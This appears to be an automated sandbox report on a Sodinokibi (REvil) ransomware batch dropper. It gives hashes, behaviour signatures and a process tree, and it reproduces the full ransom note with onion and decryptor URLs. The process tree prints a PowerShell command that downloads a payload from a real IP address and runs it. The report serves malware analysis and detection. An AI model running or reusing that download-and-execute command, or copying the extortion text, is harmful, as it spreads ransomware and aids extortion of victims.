Overview

overview

10

Static

static

cfc86f216b...ab.bat

windows7_x64

10

cfc86f216b...ab.bat

windows10_x64

10

Analysis

  • max time kernel
    76s
  • max time network
    45s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    02-09-2020 21:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cfc86f216b68d4b768a61dc8091a67ab.bat

  • Size

    217B

  • MD5

    89876aac9d3c6644f7ae3b4cf68d7a1e

  • SHA1

    e37353d60d13106478fd94133ec1ae8b15e51062

  • SHA256

    146be0d88aa964787807ec908e13f1eb124530caca22ad1c3d80c73761892e90

  • SHA512

    8ea7a17a997a6b12f0acac1951fe0dc70c57221bd2204173597b951e7bf77b3f1f94a5ded81f074f51cb159d4ebe7bf7db1c207fd4febcfae1183788890ee503

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab

Extracted

Path

C:\g2u6d92-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension g2u6d92. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) [+] http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/152?s=18c0ff2af13d9203c00cedb1934a9ffd [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/73FCEC3F69393DC5 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/73FCEC3F69393DC5 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: MTw+2qveOq36UZtSU0CZ7SOXOhV8OAUkBMaceVLaCZ/rgfgZmeGu7VcRbKlqIFek x1EDyRnct/AWOM2oPiiAo1IO+RnLyKzwoSD20AQYqD1tReULbKZafKepa7HF9w39 XfVwYiPXDLlTyopjm1OT8Yw6T7e7QQbCqRLK1WMv7SUKMLQkjfh/6pVM4siEWjm5 uaArmxLvrtXoG1IpuVBbAYJMPziRmj2TTBiVctVRDmF8SNpsYMw7qsmthGMsL5kO udyFviuZLAHvbZPmYHPrIDLw2BAA9tycsFAL6eQVsXW2p3EC6REgBIMK6Qlx6a8u 4E+RSQAjAN+F2MmuPpzVx32wi2nY2WpQ7usugxh+v6g1DpFQncYg83S+CT9zeyl9 uv9ag1vGFKJHsUvF7KiF2O8fuKde/Qdw7iSD0Wyc/fUpE4NDlgbzxG6YIoMEM7zg JV6QMqVYmLbV85/Rih1n2L8cUNKf+/toX8z1NbU50OH9sALOpl3G2QfQnXX3BNPM X3rmQDyf9V23pvCN0a+STzdsOwWWGtSe95bV5RQ+YhHAyHzRcpoq4jXiuTWWfiw2 7tb/uSz7McuGe12g++DQzuFdWzPFzBPISaUI4l4kneaV1ExD6U+DR+mCPceXsyTP rp2dLPXTxS4XCQLtxgTMwfCQmhwrrzDlso/qTs93Ri5skXlPcXFR0QdK3vrsJZch 1T0vQknPMxHmio821vtVVAudz4BHd+D3B1XbZYXQPAwImXLYYKnNzbCtT0yJwK+J otLKedITtrS3eyNBXzn273jJTPEcJtF3/YnUWVx6FV3rOo6MdUWL90QAtO5xnhhp 9KqHZItkJRqYchrr9tomGva9IAYBo2E+DDbFiydTujQXsofeoI20CmBfhf6PQ2Fg 71UTMn3MHemoholqKQ50ilUKKJAgoj+L0FfGrhsq0qgm2lm+lzoboulerryLwb1q s/IFRFR8cOjvwYV5CLoCq0BVdLMgm02Ss/JSDlkuNzHbDol+sdS7ESIKJlZHKLX0 yBtFVaazaWX8sFSqff3kL0HVeH3b30PpeR8abruFNpbQjzsSt5FNfwsIOk3liPPD GvLfmzRXMiz3chF3Sqej87oBHFLb8Zn4Wo8KUAOyaA5Wl5JdPykqoHWHJ4Jb5okd jaNBdbN+4JxZHKocR2AsohjaUsWMg4alY29JJougN+i47bCqVyV77alXHJurJAkR +caI9ad45I95tEhrlZ0bgOqg6sLV8/5q/UTDPaxvhDhc76jA7cB5phOk745cZvjv kKaaxtPXzcdR8UQkFgM22vOc ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/73FCEC3F69393DC5

http://decryptor.cc/73FCEC3F69393DC5

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 37 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cfc86f216b68d4b768a61dc8091a67ab.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab');Invoke-ABXNAAYIVS;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1428
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:2644
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:2568

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1428-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1428-1-0x0000000073A50000-0x000000007413E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1428-2-0x0000000007010000-0x0000000007011000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-3-0x0000000007740000-0x0000000007741000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-4-0x0000000007620000-0x0000000007621000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-5-0x0000000008000000-0x0000000008001000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-6-0x0000000007E20000-0x0000000007E21000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-7-0x0000000008070000-0x0000000008071000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-8-0x00000000083C0000-0x00000000083C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-9-0x0000000008500000-0x0000000008501000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-10-0x0000000008880000-0x0000000008881000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-11-0x0000000009F60000-0x0000000009F61000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1428-12-0x00000000094E0000-0x00000000094E1000-memory.dmp

    Filesize

    4KB

    Download